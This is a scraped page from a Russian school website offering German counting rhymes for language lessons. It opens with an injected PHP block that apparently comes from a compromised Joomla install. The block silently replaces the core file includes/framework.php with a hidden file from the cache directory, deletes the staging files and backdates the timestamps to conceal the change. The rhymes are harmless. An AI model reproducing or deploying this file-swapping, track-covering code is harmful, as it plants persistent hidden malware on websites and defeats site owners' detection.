$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } К урокам немецкого языка.Рифмовки, считалки

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 209856

На сайте

Сейчас 18 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

К урокам немецкого языка.Рифмовки, считалки

Копилка > считалки

Eins, zwei, drei, vier, fünf, sechs, sieben,
wer hat diese Brief’ geschrieben?
Den für mich,
den für dich,
den für Bruder Friederich,
Einen Brief aus der Türkei,
eins, zwei, drei und du bist frei.

***************************

Die Mäuse singen,
die Katzen springen
bei uns im Ort.
Doch du musst fort.

***************************

Ich und du,
Bäckers Kuh,
Müllers Esel,
der bist du.

***************************

Ene, dene, Tintenfass,
geh zur Schul’ und lerne was.
Wenn du was gelernet hast,
komm nach Haus und sag mir was!
Eins, zwei, drei
und du bist frei.

***************************

Eine kleine Dickmadam
fuhr einst mit der Eisenbahn.
Eisenbahn, die krachte,
Dickmadam, die lachte.
Eins, zwei, drei und du bist frei.

**************************

Hexe Minka,
Kater Pinka,
Vogel Fu,
raus bist du.

***************************

Pippi ist im Garten gegangen.
Wie viel Vögel hat sie gefangen?
Eins, zwei, drei,
du bist frei!

***************************

Eins – zwei
Polizei,
drei – vier
wildes Tier,
fünf – sechs
böse Hex’,
sieben – acht
gute Nacht,
neun – zehn,
der muss suchen gehen.

***************************

Pinke pank,
die Puppe ist krank,
sie liegt auf der Bank.
Pinke, panke, pu,
raus bist du!

***************************

Asterix und Obelix
tun die ganze Woche nichts,
trinken Bier und essen Kuchen,
wer das glaubst, der soll jetzt suchen!

***************************

Ezel, Tezel,
wer bäckt Brezel?
Wer bäckt Kuchen,
der muss suchen.

Auf dem hohen Berge
wohnen sieben Zwerge,
haben sieben Kinder,
haben sieben Rinder,
haben sieben Bäume,
haben sieben Räume,
haben sonst noch allerlei –
du bist frei!

***************************

Auf de vi, va bunten Berge
wohnen vi, va bunte Zwerge.
Und di vi, va bunten Zwerge
haben vi, va bunte Kinder.
Und die vi, va bunten Kinder
essen jeden Tag ein Ei.
Eins, zwei, drei
und du bist frei!

***************************

Eins, zwei, drei, vier,
hinter dem Klavier
sitzt eine Maus,
du bist raus!

***************************

In einem Städtchen,
da wohnt ein Mädchen,
das heult immerzu,
fast so wie du.

***************************

Eins, zwei, drei, vier, fünf, sechs,
im Walde wohnt die Hex’;
sechs, fünf, vier, drei, zwei,
und kocht den Hirsebrei;
fünf, vier, drei, zwei, ein’;
bald wird er fertig sein.
Eins, zwei, drei,
du bist auch dabei.

***************************

In diesem Haus
wohnt eine Maus.
Ich bleib’ hier stehen
und du musst gehen.

Auf dem Berge Sinai
wohnt der Schneider Kikriki,
guckt mit seiner Brille raus,
eins, zwei, drei
und du bist aus!

***************************

Eins, zwei, drei, vier, fünf, sechs, sieben,
wo ist unsere Katze geblieben?
Heute morgen ging ganz leise
sie zur Mausjagd auf die Reise.
Ach, da kommt sie ja gegangen,
aber sie hat nichts gefangen.
Dumme Mieze, bleib zu Haus’,
du bist raus!

***************************

Eins, zwei, drei,
Butter auf den Brei,
Salz auf den Speck
und du musst weg.

***************************

Hinter seinem Türchen
sitzt ein Krokodil.
Vater will es holen
mit dem Besenstiel.
Eins, zwei, drei –
du bist frei.

***************************

Eine kleine Spitzmaus
lief ins Rathaus,
wollte etwas kaufen,
hatte sich verlaufen.
A, E, I, O, U –
raus bist du!

***************************